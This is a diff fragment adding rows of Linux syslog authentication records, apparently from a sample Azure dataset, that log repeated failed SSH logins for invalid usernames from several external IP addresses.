+16486,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:12:53,UbuntuDevEnv,2019-06-26 07:12:53,auth,UbuntuDevEnv,info,Failed password for invalid user arshad from 46.101.149.230 port 33236 ssh2,39859,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,arshad,46.101.149.2,33236,,
+16487,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:12:53,UbuntuDevEnv,2019-06-26 07:12:53,auth,UbuntuDevEnv,info,Received disconnect from 46.101.149.230 port 33236:11: Bye Bye [preauth],39859,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,46.101.149.2,33236,,
+16488,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:12:53,UbuntuDevEnv,2019-06-26 07:12:53,auth,UbuntuDevEnv,info,Disconnected from invalid user arshad 46.101.149.230 port 33236 [preauth],39859,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,arshad,46.101.149.2,33236,,
+16489,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:13:17,UbuntuDevEnv,2019-06-26 07:13:17,auth,UbuntuDevEnv,info,Invalid user wpyan from 138.68.29.52 port 55352,39964,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wpyan,138.68.29.5,55352,,
+16490,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:13:17,UbuntuDevEnv,2019-06-26 07:13:17,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,39964,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16491,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:13:17,UbuntuDevEnv,2019-06-26 07:13:17,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.29.52,39964,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.29.5,,0,
+16492,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:13:19,UbuntuDevEnv,2019-06-26 07:13:18,auth,UbuntuDevEnv,info,Failed password for invalid user wpyan from 138.68.29.52 port 55352 ssh2,39964,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wpyan,138.68.29.5,55352,,
+16493,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:13:19,UbuntuDevEnv,2019-06-26 07:13:19,auth,UbuntuDevEnv,info,Disconnected from invalid user wpyan 138.68.29.52 port 55352 [preauth],39964,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wpyan,138.68.29.5,55352,,
+16494,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:13:19,UbuntuDevEnv,2019-06-26 07:13:19,auth,UbuntuDevEnv,info,Received disconnect from 138.68.29.52 port 55352:11: Bye Bye [preauth],39964,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.29.5,55352,,
+16495,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:13:26,UbuntuDevEnv,2019-06-26 07:13:26,auth,UbuntuDevEnv,info,Invalid user zhouh from 206.189.118.156 port 45660,40000,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zhouh,206.189.118.1,45660,,
+16496,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:13:26,UbuntuDevEnv,2019-06-26 07:13:26,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,40000,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16497,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:13:26,UbuntuDevEnv,2019-06-26 07:13:26,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=206.189.118.156,40000,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,206.189.118.1,,0,
+16498,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:13:28,UbuntuDevEnv,2019-06-26 07:13:27,auth,UbuntuDevEnv,info,Failed password for invalid user zhouh from 206.189.118.156 port 45660 ssh2,40000,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zhouh,206.189.118.1,45660,,
+16499,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:13:28,UbuntuDevEnv,2019-06-26 07:13:27,auth,UbuntuDevEnv,info,Received disconnect from 206.189.118.156 port 45660:11: Bye Bye [preauth],40000,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,206.189.118.1,45660,,
+16500,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:13:28,UbuntuDevEnv,2019-06-26 07:13:27,auth,UbuntuDevEnv,info,Disconnected from invalid user zhouh 206.189.118.156 port 45660 [preauth],40000,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zhouh,206.189.118.1,45660,,
+16501,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:13:39,UbuntuDevEnv,2019-06-26 07:13:39,auth,UbuntuDevEnv,info,Invalid user vps from 64.202.187.152 port 34306,40042,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vps,64.202.187.1,34306,,
+16502,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:13:39,UbuntuDevEnv,2019-06-26 07:13:39,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=64.202.187.152,40042,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,64.202.187.1,,0,
+16503,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:13:39,UbuntuDevEnv,2019-06-26 07:13:39,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,40042,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16504,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:13:42,UbuntuDevEnv,2019-06-26 07:13:41,auth,UbuntuDevEnv,info,Failed password for invalid user vps from 64.202.187.152 port 34306 ssh2,40042,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vps,64.202.187.1,34306,,
+16505,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:13:42,UbuntuDevEnv,2019-06-26 07:13:41,auth,UbuntuDevEnv,info,Received disconnect from 64.202.187.152 port 34306:11: Bye Bye [preauth],40042,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,64.202.187.1,34306,,
+16506,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:13:42,UbuntuDevEnv,2019-06-26 07:13:41,auth,UbuntuDevEnv,info,Disconnected from invalid user vps 64.202.187.152 port 34306 [preauth],40042,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vps,64.202.187.1,34306,,
+16507,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:13:59,UbuntuDevEnv,2019-06-26 07:13:58,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=87.101.240.10,40104,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,87.101.240.1,,0,
+16508,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:13:59,UbuntuDevEnv,2019-06-26 07:13:58,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,40104,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16509,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:13:59,UbuntuDevEnv,2019-06-26 07:13:58,auth,UbuntuDevEnv,info,Invalid user tigrou from 87.101.240.10 port 58478,40104,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tigrou,87.101.240.1,58478,,
+16510,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:14:01,UbuntuDevEnv,2019-06-26 07:14:01,auth,UbuntuDevEnv,info,Failed password for invalid user tigrou from 87.101.240.10 port 58478 ssh2,40104,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tigrou,87.101.240.1,58478,,
+16511,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:14:01,UbuntuDevEnv,2019-06-26 07:14:01,auth,UbuntuDevEnv,info,Received disconnect from 87.101.240.10 port 58478:11: Bye Bye [preauth],40104,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,87.101.240.1,58478,,
+16512,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:14:01,UbuntuDevEnv,2019-06-26 07:14:01,auth,UbuntuDevEnv,info,Disconnected from invalid user tigrou 87.101.240.10 port 58478 [preauth],40104,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tigrou,87.101.240.1,58478,,
+16513,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:14:52,UbuntuDevEnv,2019-06-26 07:14:52,auth,UbuntuDevEnv,info,Invalid user admin from 138.68.29.52 port 44438,40300,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,138.68.29.5,44438,,
+16514,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:14:52,UbuntuDevEnv,2019-06-26 07:14:52,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.29.52,40300,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.29.5,,0,
+16515,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:14:52,UbuntuDevEnv,2019-06-26 07:14:52,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,40300,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16516,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:14:55,UbuntuDevEnv,2019-06-26 07:14:55,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 138.68.29.52 port 44438 ssh2,40300,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,138.68.29.5,44438,,
+16517,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:14:55,UbuntuDevEnv,2019-06-26 07:14:55,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 138.68.29.52 port 44438 [preauth],40300,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,138.68.29.5,44438,,
+16518,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:14:55,UbuntuDevEnv,2019-06-26 07:14:55,auth,UbuntuDevEnv,info,Received disconnect from 138.68.29.52 port 44438:11: Bye Bye [preauth],40300,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.29.5,44438,,
+16519,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:14:58,UbuntuDevEnv,2019-06-26 07:14:58,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,40311,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16520,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:14:58,UbuntuDevEnv,2019-06-26 07:14:58,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=46.101.149.230,40311,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,46.101.149.2,,0,
+16521,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:14:58,UbuntuDevEnv,2019-06-26 07:14:58,auth,UbuntuDevEnv,info,Invalid user vps from 46.101.149.230 port 50358,40311,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vps,46.101.149.2,50358,,
+16522,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:15:00,UbuntuDevEnv,2019-06-26 07:15:00,auth,UbuntuDevEnv,info,Failed password for invalid user vps from 46.101.149.230 port 50358 ssh2,40311,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vps,46.101.149.2,50358,,
+16523,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:15:00,UbuntuDevEnv,2019-06-26 07:15:00,auth,UbuntuDevEnv,info,Disconnected from invalid user vps 46.101.149.230 port 50358 [preauth],40311,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vps,46.101.149.2,50358,,
+16524,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:15:00,UbuntuDevEnv,2019-06-26 07:15:00,auth,UbuntuDevEnv,info,Received disconnect from 46.101.149.230 port 50358:11: Bye Bye [preauth],40311,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,46.101.149.2,50358,,
+16525,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:15:04,UbuntuDevEnv,2019-06-26 07:15:04,auth,UbuntuDevEnv,info,Invalid user rv from 206.189.118.156 port 34878,40383,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rv,206.189.118.1,34878,,
+16526,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:15:04,UbuntuDevEnv,2019-06-26 07:15:04,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=206.189.118.156,40383,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,206.189.118.1,,0,
+16527,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:15:04,UbuntuDevEnv,2019-06-26 07:15:04,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,40383,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16528,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:15:07,UbuntuDevEnv,2019-06-26 07:15:06,auth,UbuntuDevEnv,info,Failed password for invalid user rv from 206.189.118.156 port 34878 ssh2,40383,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rv,206.189.118.1,34878,,
+16529,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:15:07,UbuntuDevEnv,2019-06-26 07:15:06,auth,UbuntuDevEnv,info,Disconnected from invalid user rv 206.189.118.156 port 34878 [preauth],40383,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rv,206.189.118.1,34878,,
+16530,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:15:07,UbuntuDevEnv,2019-06-26 07:15:06,auth,UbuntuDevEnv,info,Received disconnect from 206.189.118.156 port 34878:11: Bye Bye [preauth],40383,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,206.189.118.1,34878,,
+16531,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:15:12,UbuntuDevEnv,2019-06-26 07:15:11,auth,UbuntuDevEnv,info,Invalid user tomcat from 64.202.187.152 port 51740,40410,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tomcat,64.202.187.1,51740,,
+16532,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:15:12,UbuntuDevEnv,2019-06-26 07:15:11,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=64.202.187.152,40410,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,64.202.187.1,,0,
+16533,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:15:12,UbuntuDevEnv,2019-06-26 07:15:11,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,40410,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16534,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:15:13,UbuntuDevEnv,2019-06-26 07:15:13,auth,UbuntuDevEnv,info,Failed password for invalid user tomcat from 64.202.187.152 port 51740 ssh2,40410,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tomcat,64.202.187.1,51740,,
+16535,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:15:13,UbuntuDevEnv,2019-06-26 07:15:13,auth,UbuntuDevEnv,info,Disconnected from invalid user tomcat 64.202.187.152 port 51740 [preauth],40410,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tomcat,64.202.187.1,51740,,
+16536,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:15:13,UbuntuDevEnv,2019-06-26 07:15:13,auth,UbuntuDevEnv,info,Received disconnect from 64.202.187.152 port 51740:11: Bye Bye [preauth],40410,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,64.202.187.1,51740,,
+16537,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:16:06,UbuntuDevEnv,2019-06-26 07:16:06,auth,UbuntuDevEnv,info,Invalid user hydra from 87.101.240.10 port 47504,40658,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hydra,87.101.240.1,47504,,
+16538,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:16:06,UbuntuDevEnv,2019-06-26 07:16:06,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=87.101.240.10,40658,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,87.101.240.1,,0,
+16539,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:16:06,UbuntuDevEnv,2019-06-26 07:16:06,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,40658,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16540,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:16:08,UbuntuDevEnv,2019-06-26 07:16:07,auth,UbuntuDevEnv,info,Failed password for invalid user hydra from 87.101.240.10 port 47504 ssh2,40658,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hydra,87.101.240.1,47504,,
+16541,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:16:08,UbuntuDevEnv,2019-06-26 07:16:08,auth,UbuntuDevEnv,info,Received disconnect from 87.101.240.10 port 47504:11: Bye Bye [preauth],40658,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,87.101.240.1,47504,,
+16542,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:16:08,UbuntuDevEnv,2019-06-26 07:16:08,auth,UbuntuDevEnv,info,Disconnected from invalid user hydra 87.101.240.10 port 47504 [preauth],40658,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hydra,87.101.240.1,47504,,
+16543,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:16:27,UbuntuDevEnv,2019-06-26 07:16:27,auth,UbuntuDevEnv,info,Invalid user postgres from 138.68.29.52 port 33532,40739,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,postgres,138.68.29.5,33532,,
+16544,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:16:27,UbuntuDevEnv,2019-06-26 07:16:27,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.29.52,40739,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.29.5,,0,
+16545,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:16:27,UbuntuDevEnv,2019-06-26 07:16:27,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,40739,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
